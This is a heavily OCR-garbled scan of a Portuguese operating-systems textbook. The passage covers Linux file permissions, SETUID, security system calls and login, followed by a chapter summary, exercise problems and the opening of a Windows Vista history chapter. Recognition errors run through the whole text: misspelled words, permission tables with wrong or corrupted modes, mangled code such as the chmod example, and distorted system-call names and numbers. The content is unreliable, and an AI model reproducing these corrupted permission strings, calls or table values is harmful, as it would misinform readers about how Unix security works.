to de permissoes determinadas pelo processo criador. Es¬ 
sas permissoes especificani quais os (ipos de accssos que o 
proprieiario, os outros membros do grupo do proprieiario 
e o restante dos usuarios tem sobie o arquivo. Para cada 
uma dessas tres categorias H os accssos podem ser de leitura, 
escrita e execuęao, representados pelas letras r, w e x, res- 
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pectivamente. A habilidade para executar urn arquivo ape- 
nas fem sentido, obviamente r se o referido arquivo e um 
programa binario executavel. U ma temativa de execuęao 
de um arquivo quc tein permissao de execuęao mas nao 
ć cxccutavd (isto ć, nap se inicia com um cabcęalho vali¬ 
do) causa uma falha c rctorna um crro, Visto quc cxistcm 
tres categorias dc usuarios c 3 bits por categoria, 9 bits sao 
sufirientes para representar os direitos de acesso, Alguns 
cxemplos desses numeros dc 9 bits c seus significados sao 
most rad os na Tabela 10.14. 

As primeiras duas entradas na Tabela 10.14 sao daras 
e permitem que o proprietario e o grupo do proprieiario te- 
nham acesso completo, respectivamente. A entrada seguinte 
permite quc o grupo do proprietario leia o arquivo, mas nao 
o allerc, e impede quc estranhos faęam quaisquer acessos, 
A quarta entrada e comum para um arquivo de dados que 
o proprietario quer deixar pub lica Da mesma maneira, a 
quinta entrada e a usual para um programa dispomvel pnbli- 
cameme. A sexta entrada impede qualquer acesso de qual- 
quer usuario. Esse modo muitas vezes e Lisado para arqmvos 
simulados {dttnnny) empregados para exclusao miii u a, pois 
uma lcnlativa dc criar esse arqtiivo falliara se deja existe. 
Assirn, se varios proces sos tentam simultaneamente criar 
esse arquivo como uma trava, somente um deles consegue. 
O ultimo exemplo na verdade e estranho, pois cede mais 
direitos a o restante do mundo do que a o proprietario, Con- 
mdo, sua existencia segue as regras de proteęao. Felizmente, 
ha como o proprietario alterar subsequentemente o modo 
dc protcęao, me sino sem ter qualquer acesso a o arquivo. 

O usuario com o UID igual a 0 e especial, chamado 
de superusuario (ou root). O su per usuario tem o poder 
de ler e escrever todos os arquivos do sistema, nao impor- 
lando quem sejani os proprietarios ou como eles estejam 
protegidos. Os processos com UID 0 tambem tem a capa- 
ridade dc cxecutar um peąueno numero de chamadas dc 
sistema protegidas quc sao negadas aos usuarios cornuns. 
Em gcral, somente o administrador do sistema sabc a senha 
do supemsuario, e mb ora mnitos estudantes dc graduaęao 
considerem um esporie interes same encontrar falhas no 
sistema dc modo a poder acessa-lo como supemsuario sem 


saber a senha. A administraęao do sistema tema repreender 
essa atiyidade. 

Os diretórios sao arquivos e tem os mesmos modos 
de proteza o que os arquivos comuns, exceto que o bil x 
sc refere a permissao dc busca cm vez dc permissao dc 
execuęao. Assim, um direlório que tem modo de proteęao 
rvw-A?-xperinitc Lei tura, modificaęao e busca no direió- 
rio por seu proprietario, mas permite somente Idtnra e 
busca pelos outros usuarios, impedindo-os dc adicionar 
ou remover arqiiivos nele. 

Os arqnivos especiais correspondentcs aos dispositi- 
vos de E/S apresentam os mesmos bits de proteęao que os 
arquivos lcgularcs. Essc mccanismo pode ser usado para 
linii tar o accsso aos dispositlvos de E/S. Por escmplo, o ar- 
qutvo especial da impressora, /dev/lp, poderia ser proprie- 
dade do root ou de um usuario especial daemon, e ter o 

modo dc proteęao nv-.para impedir quc quaiquer um 

tivesse acesso direto a im press ora. A finał, se qualquer um 
pudesse imprimir de acordo com sua vomade, seria o ca os. 

Obviamente, ter o /dev/lp como propriedade de, diga- 

mos, um daemon com modo de proteęao rw -significa 

quc ninguem alem ddc pode usar a impressora* Apesar 
dc isso poder poupar muitas arvores inocentes dc serem 
mortas prematuramente, algumas vez,es os usuarios tem uma 
necessidade legftima de imprimir algo. De fato, existe um 
prób lenia mais gcral dc permitir o acesso controiado a lo- 
dos os disposilivos de E/S e outros recursos do sistema. 

Essc problcma foi rcsoMdo pcla adięao dc um novo bit 
de proteęao, o bit SETEJID, aos 9 bits de proteęao dism- 
tidos anteriormeote. Quando um programa que tem o bit 
SETUID ativado e cxecutado, o UID efetivo para aquclc 
processo se loma o UID do proprietario do arquivo execu- 
tavel, em vez do UID do usuario que o invocou. Quando 
urn processo tema abrir um arquivo, o UID efetivo e quem 
devc ser ycrificado, nao imponando o UID subjacente real. 
Fazendo com que o programa que acessa a tmpressora seja 
propriedade do daemon, mas com seu bit SETUID ativado, 
qualquer usuario pode executa-lo e ter o poder do daemon 
(por exemplo, acesso a fdev/lp), mas somente para executar 


Binario 

Simbólico 

Acessos permitidos ao arquivo 

111000000 

rwx . 

O proprietario pode ler, escrever e executar 

111111000 

rwxrwx— 

O proprietario e o grupo podem ter, escrever e executar 

110100000 

rw-r-— 

O proprietario pode ler e escrever; o grupo pode ler 

110100100 

rw-r-r— 

O proprietario pode Ser e escrever; todos os outros podem ler 

111101101 

rwxr-xr-x 

O proprietario pode fazer qualquer coisa; os demais podem ler e executar 

ooocooooo 


Ntngućm tem nenhum tipo de acesso 

000000111 

--rwx 

Somente usuarios de fora t£m acesso (estranho, mas possivel) 


1 Tabela 10.14 Alguns exemplos ds modos de proteęao de arquivos. 
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aqude programa (que pode enfileirar trabalhos de impres¬ 
jo para imprimi-los ordenadamente). 

Mui los program as sensivcis do Linii* sao propiiedades 
do roni mas tern o SETU1D ativado, Por cxcmplo, o pro- 
grama que permite que os usuarios alierem suas senhas 
(passwd) precisa escrever no arquivo de senhas. Deixar o 
arquivo de senhas iiberado publicameme para escrita pode 
nao ser lima boa ideia. Em eon trap ar lida, existe um pro- 
grama de propriedade do root com o bit SETU1D ativado. 
Embora o programa tenha acesso completo ao arquivo de 
senhas, cle somente alt era a senha do chamador e nao per- 
mite qualquer outro accsso ao arquivo de senhas. 

Alern do bit SETUID, existe tambem o bil SET GID. que 
trabalha de maneira analoga, dando temperariamenie ao 
usuario o GID efetivo do programa. Ent ret anto, esse bit ra- 
ranienie e u sad o na pratica. 

10J-2 I Chamadas de sistema para 
seguranca no Limix 

Existc apenas urn peąneno numero de chamadas dc 
sistema rdarionadas a seguranęa, As mais importantes es- 
tao reiadonadas na Tabela 10.3 5. A chamada de sistema 
mais ampla nieme usada e chimod, que serve para alicrar o 
modo de proteęao, Por exemplo, 

s = chmodjYusr/ast/newganne”, 0755); 

configura newgnme para rwxr-xr-x t de modo qne qualquer 
nm pode cKcaita-lo (nole que o numero 0755 e urna cons- 
tame ocial, o que e basiame conveniente, pols os bits de 
proteęao sao organizados cm grupos dc 3 bits). Somente os 
propńeiarios dos arqnivos e o superusuario podem alterar 
sens própnos bits de proteęao. 

A chamada de sistema access verifica se um acesso es- 
pecifico csUi antorizado, considerando, para isso, os UID 
e GID reais, Essa chamada e necessaria para evitar viola- 
ędes de seguranęa nos programas que tem SETUID ativado 
e periencente ao root. Esse programa pode fazer qualquer 


colsa e, assim, muitas vezes ele precisa verificar se o usua- 
rio tein a permissao para executar cerlo acesso. O progra¬ 
ma nao pode simplesmente ten tar, pois o acesso sempre 
ocorrera, Com a chamada de sistema access, o programa 
pode deierminar se o acesso ć permkido pele UID real e 
pelo GID real. 

As pro x i mas quatro chamadas de sistema retornam os 
UIDs c GlDs rca! e cfctivo. As ulrimas trćs sao permilidas 
somente para o superusuario — elas trocam o proprielario 
do arquivo, o UID e o GID do processo. 

10-7-ł I Implementacjo de seguranca no 
Linux 

Guando um usuario entra no sistema, o programa de 
entrada, login (que tem SETU1D root), pede um nonie de eon- 
ta e urna senha. Ele criptografa a senha e emao pesquisa 
no arquivo de senhas, Jetcfpasswd, para verse exisie corres- 
pondencia com a senha que se encontra nele (sisternas em 
rede fimdonam de modo ligdramente diferente)* A crip- 
togralia $erve para impedir que a senha seja armazenada 
dc modo convcncional em qualquer lugar do sistema, Se a 
senha esta correia, o programa login procura no arquivo / 
etc/passwd o nonie do shell preferido do usuario — prova- 
vdmente bash, mas tambem pode ser algum outro shell, 
como csh on ksh. O programa login emao usa sełuid e se- 
tgid para obter o UID c o GID do usuario (lembre-se: cle 
inidou como SETUID de root). En tao, ele abre o teclado 
para a entrada-pad ra o (descritor de arquivo 0), a lela para 
a safda-padrao (descritor de arquivo I) e a tela para o erro- 
-padrao (descritor de arquivo 2), Por firn, de executa o 
shell preferido, terminando a si próprio. 

Nesse ponto o shell preferido deve estar executando 
com UID c GID corretos e a entrada, a safda e o erro-pa- 
drao serao ajustados para sens dispositivos-padrao. Todos 
os processos que sao criados (isto e, co ma n dos digitados 
pelo usuario) automaiicamente herdam os UID e GID do 


Chamada de sistema 

Descrięao 

$ =■ chmod(oamioho P modo) 

Troć a o modo do proteęao do arquivo 

s = accesstoaminho, modo) 

Verifica acesso usando o UID e GID reais 

uid = getuidf) 

Obtem o UID real 

uid = geteuid() 

Gbtóm o UID efettvo 

gid = getgictf) 

Obtem o GID neal 

gid = getgid() 

Obtem o GID efetivo 

s = chownfcanninho, proprielario, grupo) 

Troca proprielario e grupo 

s = setuid(uid) 

Configura O UID 

s - selgidfgid) 

Configura o GID 


I Tabela 10.15 Algumas chamadas do sistema reiadonadas a seguranęa. O código de retorno s 6 -1 caso ocorra um erro; uid e gid 
sao o VI D e o GID. respectivamente. Os par^metros sao autoexpEEcativos. 
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shell e, assim, terao proprietaiio e grupo corretos. Todos os 
arquivos que des criam obtem esses valores. 

Quando qiialquer processo tema abrir urn arquivo, o 
sistcma de arquivos primciro compara os l>its de protcęao do 
i-nodc doarquivo com o UID efctivo e o GID efetivodo cha- 
mador para ver se o acesso e permitido. Em caso afirmativo, 
o arquivo e aberto e um descriior de arquivo e retornado. Em 
caso negativo, o arquivo nao ć aberto e -1 e retornado. 
N en h u m a ve ri fi ca ęa o e rea li zad a nas cha m a das su bse q u e n - 
les read e write. Conse q nenie me nte, se o modo de proteęao e 
alterado quando o arquivo ja esia aberto, o novo modo nao 
a feta os proccssos qucja estao com o arquivo aberto, 

O modelo de seguranęa no Linux c sua implementa- 
ęao sao essendalmente os mesmos da malaria dos sistemas 
UftIX tradicionais. 


Resumo 

O Lmux comcęou sua vkla como urn sistcma de eódigo 
aberto que era urna cópia integral do UNIX, mas agora e 
usado em maquinas que vao desde notebooki ate super- 
computadores. Ele possui tres Interfaces: o shell, a bibliote- 
ca C e as chamadas de sistcma, Aiem detas, urna interface 
grafica costuma ser utilizada de forma a simplifkar a in- 
teraęao do usuario com o sistema, O shell permite que os 
usuarios digitem comandos para execuęao. Esses comandos 
podem ser simpies, pipdines ou estruturas mais comple- 
xas. A cm rada e a safda podem ser red i red on a das, A biblio - 
tcca C contem as cha mada s dc sistcma c tambćm rnuitas 
cxtcnsoes dessas chamadas — como printf, para cscrcvcr 
safda formatada cm arquivos, A interface real dc chamadas 
de sistema e depemknte da arquiteuira e, nas plataformas 
x86, e composta de aproximadamente 250 chamadas de 
sistcma, ca da uma responsavd por uma tarefa e nada mais. 

Os conceitos principais do Linux incluem o processo, 
o modelo de memória, a E/S e o sistema de arquivos. Os 
proccssos podem criar subprocessGS, gerando uma arvore 
de proccssos. O gerenciamento de proccssos no Lmux e di- 
ferente daquelc do UNIX, pois o Linux eonsidera cada enti- 
dadc dc execuęao — urn processo com somcnte urn thread 
ou cada thread de urn processo com multiplos threads ou 
do mielec — como uma ta rera unica. Um processo, ou uma 
tarefa simpies em gcral, c represeniado por mcio dc dois 
componentes principais: a estrutura da tarefa e as i n for ma- 
ęoes adięionais que descrevem o espaęo de endereęamento 
do usuario. A estru litra da tarefa esta sempre na memória, 
mas as de mais in forma ęoeś mais recemes podem ser pagi- 
natlas para o disco, A eriaęao dc proccssos se da por mcio 
da duplicaęao da estrutura de tarefa e, em seguida, pela 
configuraęao da informaęao sobre a imagem da memória, 
de forma quc da aponte para a imagem da memória do 
pai. As cóp.ias rcais das paginas da imagem da memória sao 
criadas somente se o companilhaniemo nao for permitido 
c a alteraęao da memória for necessaria. Esse mecanismo 
ć cha mado dc copiar-se-escrita. O cscalonamcnto ocorrc 


a partir do uso de um algoritmo baseado em prioridade, o 
qual favorece os proccssos imerativos. 

O modelo dc memória consiste em tres segmentos por 
processo: eódigo, dados c pi Ilia. O gerenciamento dc me¬ 
mória e fdto por paginaęao, O mapa da memória mantem 
o com role do esta do de cada pagina, e o daemon de pagi- 
naęao usa o algoritmo do relógio para manier um numero 
suficicntc de pagtnas livres. 

Os dispositivos dc E/S sao accssados usando arquivos 
especiais; cada unitem um numero do dispositivo principal 
e um numero do dispositivo scamdario. A E/S de disposi- 
tivo de bloco usa urna memória principal para fazer cache 
de blocos e reduzir o numero de acessos ao disco. A E/S de 
caractcrcs pode ser fdta no modo bruto, ou fluxos de ca- 
racteres podem ser niodifkadas via disciplmas de linhas. 
Os dispositivos de rede sao tratados de maneira disUnta, ou 
seja, pela assodaęao de todos os módtilos de p rolo colo s de 
rede ao processo ao qual se referem os pacotes de rede e a 
partir do processo do usuario, 

O sistema de arquivos c hicrarquico e contem arquivos 
e diretórios. Todos os discos sao montados em uma irnica 
arvore de direiórios que se i nicią a partir de uma unica 
raiz. Arquivos individuais podem ser ligados a um direió- 
rio a partir de qualqucr lugar no sistema dc arquivos. Para 
tisar um arquivo ( primeiro de deve ser aberto, obtendo, 
assim, um descriior de arquivo que permila a lei tura e a es- 
crlta nelc. Internamcnie, o sistema dc arquivos usa ircsla- 
bdas principais: a de descritores de arquivos, a de descriio- 
res de arquivos abertos e a de i-nodes. A tabela de i-nodes e 
a mais importante delas, pois contem todas as informaęóes 
ad ministra li vas sobre um arquivo e a localizaęao de sens 
blocos, Diretórios e di$posUivos tambćm sao representados 
como arquivos, bem como outros arquivos especiais. 

A proteęao e baseada no eon trok de acesso para leitu- 
ra, escrita e execuę!o de acesso para o proprietario, o grupo 
c outros. Para os diretórios, o bil dc execuęao ć intcrprcia- 
do como pemiissao dc busca, 

Problemas 

1. Um di retorto contem os seguintes arquivos: 


aardvark 

nul ha ich 

bonefish 

ostrieb 

capybara 

porpoise 

di ngo 

quacker 

emu 

rabbit 

feret 

seahorse 

grunion 

uma 

hycną 

imicorn 

ibex 

Yicuna 

jelyfish 

weasd 

koala 

yak 

Hania 

zebu 

mamrot 
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Quais arquivos serao apresentados pelo ęoniando 
is [abcl*e*? 

2. O que faz o seguinte pipdine no shell do Lmux? 
grep nd xyz | wc -I 

3. Escreva um pipdine Linux que imprinia a oitava linha do 
arqu.ivo z na salda-padrao. 

4. Por quc o Linux distingue entrc safd a-padrao e erro-pa¬ 
drao, ąuando ambos tem o terminal como padrao? 

5. Um usuarioem um terminal digita os seguintes comandos: 
a | b | c & 

d | e | f & 

Após o shell ter proccssado csses comandos, ąuantos pro¬ 
cessos novos estarao exeeulando? 

6. Quando o shell do Linu?c inicia um processo, de coloca 
cópias dc suas variaveis dc ambiemc, como HOME, na pi- 
Iha do processo, dc modo que o processo possa sabęr qual 
e diretório korne. Se esse processo posteriormenie criar 
um outro processo, o processo filho automaticamente 
tera aeesso a essas variaveis tambem? 

7. Galenie ąuanto temp e gasło para aiar um processo filho 
sob as seguimes condiędes: tamanho do código = 100 KB; ta- 
manho dus dados = 20 KB; tamanho da pilha = 10 KB; tama¬ 
nho da tabela dc processos - I KB; estrutura do usuario - 5 KB. 
A interrupęao do nuclco cm si, mduindo o retorno, gasta 
I ms e a maąuina pode copiar unia palavra de 32 bits a 
ca da 50 ns. Os segmenios de texto sao companilhados, 
mas os segmentos de da des e pillia nao o sao. 

8. A medida que programas de megabytes foram se toina n- 
do mais comuns, o tempo gasto execmando a cha mada 
dc sistema fork cresceu propordcmalmcme. Quandofork c 
exccutada no Untix, o espaęo de endereęamcnto dos pais 
nao ć copiado, confornie ditaria a semantica Iradicional 
dessa chamada. Como o Linux cvita que o filho Taęa algo 
que mudaria completameme a semamica de fork? 

9- Tern senlido relirar a memória de um processo quando 
cle enlra no estado zumbi? Porqu£? 

10 . Na sua opiniao, por quc os projetistas do Liniuj impos- 
sibilitam a um processo enviar um smal para um oturo 
processo quc nao esteja cm sen grupo de proecssos? 

11. Urna chamada de sistema geralmeme e implementada 
usando urna mstruęao de interrupęao de software (trap). 
Urna chamada comum dc roli na tambem poderia ser osa¬ 
da da mesma maneira no hardware do Pentium? Em caso 
afirmaiWo, sob quais condięoese como? Em caso negati- 
vo, por que? 

12 . Ern geral, voce acha que daemons tein maior ou inenor 
prioridade do que os processos interativos? Por que? 

13. Quando um processo novo e cna do, cle deve ser associa- 
do a um u ni co numero mleko cha mado PID. E sufkieme 
ter um contador no nucleo, que e inerememado a cada 
crlaęao dc processo, para ser usado como o novo PID? 
Justifique sua resposta. 


14 . Na entrada de cada processo na tabela dc processos, o PID 
do pal do processo e ar ma żenado, Por que? 

15 . Quals combinaędes dos bits sharm$Jła$$ t u sad os pelo 
comando clone do Linux, correspondem a chamada 
fork convcncional do UNIX? E para a criaęao de um 
ihrcad convencional do UNIX? 

16. O escalonador Linux passou por urna significaiiva revisao 
entre os nucleos 2.4 e 2.6, O escalonador at.ua! pode to¬ 
ina r decisóes de escalonaniento em tempo de 0(1). Como 
isso e possfvel? 

17. Durame o booi do Linux (ou da maioria dos omros siste- 
mas operacionais), o carregador de bom (boofstrap loader), 
situado no setor 0 do disco, primeiro carrega o programa 
de bool que por sua vez carrega o sistema operacional. 
Por quc e necessario esse passo extra? Certa menie seria 
mais simplcs se o carrega do r de boot do setor 0 simples- 
mentc carregasse diretamenle o sistema operacional. 

18. U m certo editor tem 100 KB de cod i go de programa, 
30 KB de dados Inicializados e 50 KB de B&S. A pil ha 
i nicią i e de 10 KB. Su port ha que tres cópias dęsse editor 
sejam i nicią da s simultancamente. Quanta memória ffsica e 
nccessaria (a) se o códigoć compartilhado e(b) se nao o 6? 

19 . Por qLie as tabelas de descriiores de arquivos aberlos sao 
necessarias no Linux? 

20. No Linux, os segmenios de dados e de pilha sao paginados 
e trocados para o disco para uina cópia-rasamho mantida 
em uma paginaęao ou partięao espccia! do disco, mas o 
segmento de código usa o próprio arquivo binario execu- 
tavd. Por que? 

21 . Descreva uma maneira de usar mmapcom sinaispara cons- 
truir um mecanismo de comuntęaęao entre processos. 

22. Urn arquivo e mapeado usando a seguinte chamada dc 
sistema mmap: 

mmap(65536, 32768, READ, FLAGS, fd, 0) 

As paginas sao dc S KB, Qual byte do arquivo ć acessado 
por meio da leitura de um byte no endereęo de memória 
72,000? 

23. Após a chamada de sistema do problema amerior ter sido 
executada, a chamada 

mijnmap(65536, 8192) 

e realizada, Essa segunda e bem-sucedida? Em caso a fir¬ 
ma li vo, quais bytes do arquivo permanecem mapeados? 
Do comrario, por que da falha? 

24. Uma falia de pagiua pode fazer com que o processo em 
execuęao seja lerminado? Em caso afirmativo, dc um 
exemplo. Em caso negativo, por que? 

25 . No sistema companheiro (buddy) de gcrenciamcnto de 
memória, e possivel que dois blocos adjacemes de memó¬ 
ria livre de mesmo tamanho coexislam sem serem (un- 
didos em um unico bloco? Em caso afirmaiivo, de um 
exemplo de como isso pode acontccer. Caso comrario, 
mostre que isso e impossfvd. 
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26- Ć dito no texto quc urna pariięao dc paginaęao trabalha 
mclhor do que um arquivo de paginaęao, Por quc isso 
acomecc? 

27. Dć duas vantagcns do uso dc no mes rdalivos dc camu 
nhos sobie os nomes absolutos. 

28. As seguintes chamadas de Lravas {lock) sao lei las por uma 
cołeęao de proces sos. Se um proce sso na o consegue obier 
a lrava, ela e foloqueada. Diga o que ocorre em cada cha¬ 
ma da. 

(a) A quer uma trava compartilhada para os byles de 0 
a 10. 

(b) B qucr uma uava cxclusiva para os bytes dc 20 a 30. 

(c) C quer uma irava compartilhada para os bytes dc 8 a 40, 

(d) A qucr unia lrava compartilhada para os byles dc 25 
a 35, 

(e) B quer um impedimento exdusivo para o byte S. 

29. Considere o arquivo impedido da Figura ł0,18(c). Supo- 
nha que um processo teme estabelecer irava nos byles 
[0 e 11 e seja bloqueado. Em seguida, a mes de C li bera r 
a irava, um ouiro processo ainda Lema estabelecer trava 
nos byles 10 e Ile lambem e bloqueado. Que opos de 
problemas sao introduzidos na semantica por essa situa- 
ęao? Propen ha e defenda duas soluęoes. 

30. Suponha que uma chamada de sistema, Iseek procune 
por um deslocamento negativo de urn arquivo. Sugira 
duas maneiras possfvds de lidar com cssa situaęao. 

31. Se um arqmvo do Linux tem modo de pmtcęio 755 
(octal), quais sao as pcnnissdcs do proprietario, do grupo 
do p ropne talio e dos demais usuarios quanto a manipu- 
laęao do arquivo? 

32. Alguns dispositivos dc Fita tern blocos nimicrados c a ca- 
pacidade dc sobrescrcver um bloco especffico sem imer- 
ferir nos blocos anicriorcs c posteriores* Esse dispositivo 
poderia ser mornado como um sistema de arquivos do 
Luiux? 

33. Na Figura 10.16, lamo Fred quanto Lisa tern acesso ao 
arquivoxem seus respectivos diretórios após a ligaęaoen- 
tre eles, Esse acesso e compleiamente simetrico, ou seja. 
qualquer coisa que um deles pode fazer com o arquivo o 
outro tambem pode? 

34. Conforme vimos, os nomes absolutos de caminhos sao 
buscados a partir do diretório-raiz e os nomes rdativos de 
caminhos sao buscados a partir do di retor i o de l raba] ho. 
Sugira uma maneira elicieme dc implememaros dois ti- 
pos de busca. 

35. Quando o arquivo htsrfastfworkłf i aberto, varios acessos 
a disco sao necessarios para lei os blocos do i-node e do 
di retorto. Calcu le o numero necessario de atessos a dis¬ 
co considerando que o i-node para o diretório-raiz esteja 
semprc na meniória e todos os diretórios ten ha ni um blo¬ 
co de tamanho. 

36. Um i-node do Linux tem 12 endereęos de disco para os 
blocos de da dos, assini como os endereęos de blocos indi- 
retos simpies, duplos e triplos. Se cada um desses blocos 


tem 256 endereęos de disco, qual e o tamanho do ma tor 
arquivo qucpodc sertratado, assumindo que um bloco dc 
disco tenha l KB? 

37. Quando um i-node c lido do disco durante o processo 
dc abertura dc um arquim clc ć colocado em uma tabela de 
i-nodes na memória. Essa tabela tern alguns campos quc 
nao estlo presentes no disco. Um deles e um contador 
que mantem o eon troić do numero de vezcs que o i-node 
foi aberto. Por que esse campo e necessario? 

38. Em plataformas com mu lii pląs CPUs, o Linux mantem 
uma fila de execuęao (rumpteue) para cada CPU. Esia 
e uma boa ideia? Explique sua resposta. 

39. Os threads pdflush podem ser period i ca menie a co rd a dos 
para escreverde volta no disco as paginas muito arttigas — 
ameriores a 30 s. Por quc isso e necessario? 

40 . Após unia fallia no sistema seguida de reinirializaęao, ge- 
ralmente e ex ecu ta do um program a de recuperaęao. Su- 
ponha que esse programa deseubra que um contador de 
iigaęao cm um i-nodc ć 2, mas somentc uma entrada no 
diretório referenda o i-nodc. Ele pode resolver esse pró¬ 
bie ma? Como? 

41 . Faęa uma suposięao lundamcmada dc qual chamada dc 
sistema Liniix ć mais rapida, 

42 . E possfvel rcmover a Iigaęao dc um arquivo que nunca loi 
ligado? O que acomccc? 

43 . Com basc na infonuaęao apreseniada neste caphulo, sc 
um sistema de arquivos exi2 do Lmux ć colocado em um 
disco flexivel de 1,44 jMbyte, qual e a quantidadc maxinia 
de dados de arquivos do usuario que pode ser armazena- 
da nelc? Presuma que os blocos do disco sejam de 1 KI3. 

44 . Em vista de todos os problemas quc os estudantes podem 
causar caso sejam siiperusuarios, por que existe esse con- 
ceito? 

45 . Um professor compartilha arquivos com seus aiunoscolo- 
cando-os em um diretório ptiblico acessfvel pelo sistema 
Linux do Departaniento de Computaęao. Um dia ele per- 
cebc que u m arquivo colocado la, no dia amerior, estava 
com accsso dc cscrila pcrmilido a qualqucr um, Ele alt era 
as permissoes c verifica quc o arquivo e idemico a sua có- 
pia prindpal. No dia seguimc, clc pcrccbc quc o arquivo 
foi novanicntc altcrado. Como isso pode ocorrcr c como 
pode ser cvitado? 

46 . O Linux da suportc a a chamada de sistema fsuid. Ao con- 
irario de seluid, que garante ao usuario todos os di rei - 
tos da idemilicaęao associada a o programa em execuęao, 
fsuid garante ao usuario que esta execiuando o programa 
os direitos especiais relativos somente ao acesso a arąui- 
vos. Por que essa caracteristica e uli!? 

47 . Estreva um shell minimo qtie permita executar conian- 
dos simples. Ele tambem deve permitir quc os comandos 
sejam executados cm segundo piano. 

48 . Usaudo liiiguagem assembly e cha m a da s BIOS, escreva 
um programa que inicialize a si próprio a partir de um dis- 
quete # em um computador do lipo Pentium, O programa 
deve usar as chamadas BIOS para ler do teclado e ecoar os 
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caracteres digitados, simplesmente para mo&trar que esia 
executando. 

40 - Escreva um próg rama para terminal burro quc eoncctc 
duas cstaęóes de trabalho Liniix via portas seriais. Use 
as chamadas de ger en da niemo de terminais P0S1X para 
configurar as portas. 

50. Escrcva uma aplicaęao clienle-servidor que, medianie 
reąuisięio, transiira um arquivo grandę via soąucles. Re- 
cscrcva a mesma aplicaęao para quc da faęa uso dc me- 
mória compartilhada. Qua! das duas versoes deve funcio- 
nar mclhor? Por que? Utilizando arquivos dc difcremcs 
lamanhos, realize medięoes de deseni pen ho com o código 
quc escreveu. O quc vocc percebcu? O que voce acha quc 
acontece no interior do nudeo do Linux para causar esse 
com porta niemo? 

51 . Esercva uma bibliotcea basica dctbrcads dc nivcl dc usiia- 
no para ser executada no lopo do Liimx* A A PI da bi¬ 


bliotece deve conter chamadas de funęoes como mythr& 
adsjnit, mythfeads_create, mythreadsjoin, mythreads_exit 
mythread$_yield, mythreads^self c, quem sabc, aignmas 
ouiras. Em seguida, implememe essas variaveis de sin- 
cronizaęao de forma quc pennitam operaęoes concorren- 
tes seguras: mythreads_rnutexjnit mythreads_mutex_lock H 
mythreadsjxiutex_un|Qck. Antes de comeęar defina dara- 
mcnte a API c espcdfiąue a scmamica de coda cli a mada, 
Em scguida, implememe a bibliotcea cm mvel dc usuario 
coin um escalonador circular preemptivo. Vocc ta mb cm 
vai prccisar cscrcvcr uma on mais aplicaęocs com mul- 
tiplos threads que uli liżem sua bibliotcea para qisc possa 
testa-la, Por firn, substitua o mecanismo de escalonamcn- 
to simples por outro que sc com porte como o escalonador 
dc tempo 0( 1) do Linux 2,6, dcscrito neste capimlo. Com- 
parć o dcsęmpcnho dc sua(s) aplicaęao(dcs) utilizando 
cada um dos escaionadores. 
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Capitulo 



Estudo de caso 2: 
Windows Vista 


0 Windows e um sistema operacional moderno que 
exccuta eni PCs dc mesa e ern semdores empresariais, A te 
o linal de 2009, a versao para desktop mais recente era a do 
Windows Vista, e sua versao para semdores e cha mada 
Windows Server 2O0S\ Nestc capftulo, estudarcmos varias 
caracterfsticas do Windows Vista, comeęando com um breve 
histórico e, a seguir, passando para sua arquitetura. Depois 
disso estudarcmos sens processos, gerenetamemo de memó- 
ria, E/S, sistema de arquivos e, finalmente, seguranęa. 


11.1 


Historia do Windows Vista 


Os sistemas operacionais da Microsoft para PCs desktop 
c poriateis e para semdores podem ser divididos em tres 
familias; MS-DOS, Windows baseado no MS-DOS e 
Windows baseado em NT. Tern i ca menie, cada um des- 
ses sistemas e substancialmente diferente de seus pares 
e cada um dominou o mercado em decadas distimas da 
historia dos compmadores pessoais. A Tabela UJ mostra 


as datas dos prinripais lanęamentos de sistemas operacio- 
nais para desktops da Microsoft (nao induindo o popular 
XENIX, versao do UN1X, que a Microsoft vendeu para a 
Santa Cruz Operations — SCO — cm 1987). A seguir, dcli- 
ncaremos bievemcnle cada urna dessas famflias. 

ILU I Decada de 1980: o MS-DOS 

No imcio dos anos 1980, a IBM — na epoca a maior 
e mais pode rosa empresa dc computadores do mumio — 
produzia um computador pessoal baseado no micropro- 
cessador Intel 8088. Desde meados dos anos 1970, a Micro¬ 
soft era a principal fonrecedora da linguagem de programa- 
ęao BASIC, para mierocomputadores de 8 bits baseados no 
8080 e no Z-SO. Q na udo a IBM son do u a Microsoft sobre 
a licenęa da linguagem para o novo IBM PC, a Microsoft 
prontamente concordou e sugeriu que a IBM contaiasse a 
Digital Research para lentar licenciar o sistema operacjo- 
nal CP/M, ja que a Microsoft ainda nao atuava no ramo 
de sistemas operadonais. A IBM fot ate a Digital Research, 


Ano 

MS-DOS 

Windows baseado 

no MS-DOS 

Windows 

baseado em NT 

Obserwaęóes 

1981 

MS-DOS 1.0 



Distribuięao inicial para IBM PC 

1983 

MS-DOS 2.0 



Su porte para PG/XT 

1984 

MS-DOS 3,0 



Su porte para PC/AT 

1990 


Windows 3,0 


Dez miEhóes de cópias em 2 anos 

1991 

MS-DOS 5.0 



Incluido gerenciamento de memória 

1992 


Windows 3,1 


Funciona semen te em 286 ou superior 

1993 



Windows NT 3.1 


1995 

MS-DOS 7.0 

Windows 95 


MS-DOS embutido no Win 95 

1996 



Windows NT 4.0 


1998 


Windows 98 



2000 

MS-DOS 8.0 

Windows Me 

Windows 2000 

Win Me era interior ao Win 98 

2001 



Windows XP 

Substitui o Win 98 

2006 



Windows Vista 



1 Tabela 11,1 Principais lanęamentos na história dos sistemas operadonais Microsoft para PCs desktop. 


] A Micmsolt lanęuu im finał 2009. o Windows 7 c o Windows 5trvcr 200S RZ. subst ituind o o Windows Yista t o Windows Servor 200& respecti- 
Yiimente (N.R.T.). 
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mas como sen presidente, Gary Kildall, estava muiro ocu- 
pado para atender a IBM, esta relornou a Microsoft. Poli¬ 
co tempo depois, a Microsoft compron um clone do CP/M 
de unia empresa kicał, a Seattle Computer Products, crion 
lima versao do sistema para o IBM PC c o licendou para 
a IBM, O sistema foi cnlao renomcado para MS-DOS LO 
{MicroSoft Disk Opera ting System — sistema opera - 
ci 011 a 1 em disco da Microsoft) e distribuido com o primdro 
IBM PC em 1981. 

O MS-DOS era um sistema operacional de 16 bits em 
modo real, dedicado a um tinico usuario, orientado a li* 
nha de comandos e com 8 KB de código resideme na mc- 
moiia, Ao longo da decada scguinle, tanio o PC quanto o 
MS-DOS continua ram a cvoluir, acrescentando mais rc- 
cursos c capacidades. Em 1986, quando a IBM construiu 
o PC/AT baseado no Intel 286, o MS-DOS passou a ter 36 
KB, mas cominuou a ser um sistema operacional mono- 
tarefa orientado a Ihiha de comandos. 

_ 11.1.21 Decada de 1990: o Windows 

baseado no MS-DOS 

Inspirado na inier face gra lica com o usuano dos sis- 
